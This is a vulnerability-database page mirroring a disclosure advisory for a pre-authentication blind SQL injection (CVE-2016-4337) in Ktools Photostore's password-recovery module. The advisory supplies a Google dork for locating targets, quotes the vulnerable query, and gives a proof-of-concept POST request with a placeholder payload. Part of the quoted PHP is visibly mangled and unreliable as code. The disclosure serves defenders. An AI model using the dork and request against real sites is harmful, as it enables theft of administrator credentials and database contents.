Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormViktor MininPACKETSTORM:137734
HistoryJun 30, 2016 - 12:00 a.m.

Ktools Photostore 4.7.5 Blind SQL Injection

2016-06-3000:00:00
Viktor Minin
packetstormsecurity.com
37

EPSS

0.002

Percentile

56.5%

JSON
`Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection  
CVE-ID : CVE-2016-4337  
Google Dork: inurl:mgr.login.php  
Product : Photostore  
Affected : Versions prior to 4.7.5  
Impact : Critical  
Remote : Yes  
Website link: http://www.ktools.net  
Reported : 02/06/2016  
Authors : Gal Goldshtein and Viktor Minin  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
No authentication (login) is required to exploit this vulnerability.  
The Photostore application password recovery module is prone to a blind sql injection attack.  
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.  
  
  
Vulnerable code is located in the mgr.login.php file:  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
case 'recover_login': {  
mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );  
$result = ;  
mysqli_num_rows( $result );  
$returned_rows = ;  
mysqli_fetch_array( $result );  
$db_admin_user = ;  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
PoC:  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1  
Host: victim.net  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo  
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 9  
  
email=%27%20[SQL PAYLOAD];#  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
`

Related

exploitdb 1
nvd 1
cvelist 1
exploitpack 1
prion 1
zdt 1
cve 1
exploitdb
exploitdb
Ktools Photostore 4.7.5 - Blind SQL Injection
2016-06-30 00:00:00
nvd
nvd
CVE-2016-4337
2017-04-12 22:59:00
cvelist
cvelist
CVE-2016-4337
2017-04-12 22:00:00
exploitpack
exploitpack
Ktools Photostore 4.7.5 - Blind SQL Injection
2016-06-30 00:00:00
prion
prion
Sql injection
2017-04-12 22:59:00
zdt
zdt
Ktools Photostore 4.7.5 - Blind SQL Injection
2016-06-30 00:00:00
cve
cve
CVE-2016-4337
2017-04-12 22:59:00

EPSS

0.002

Percentile

56.5%

JSON
Related for PACKETSTORM:137734
exploitdb1nvd1cvelist1exploitpack1prion1zdt1cve1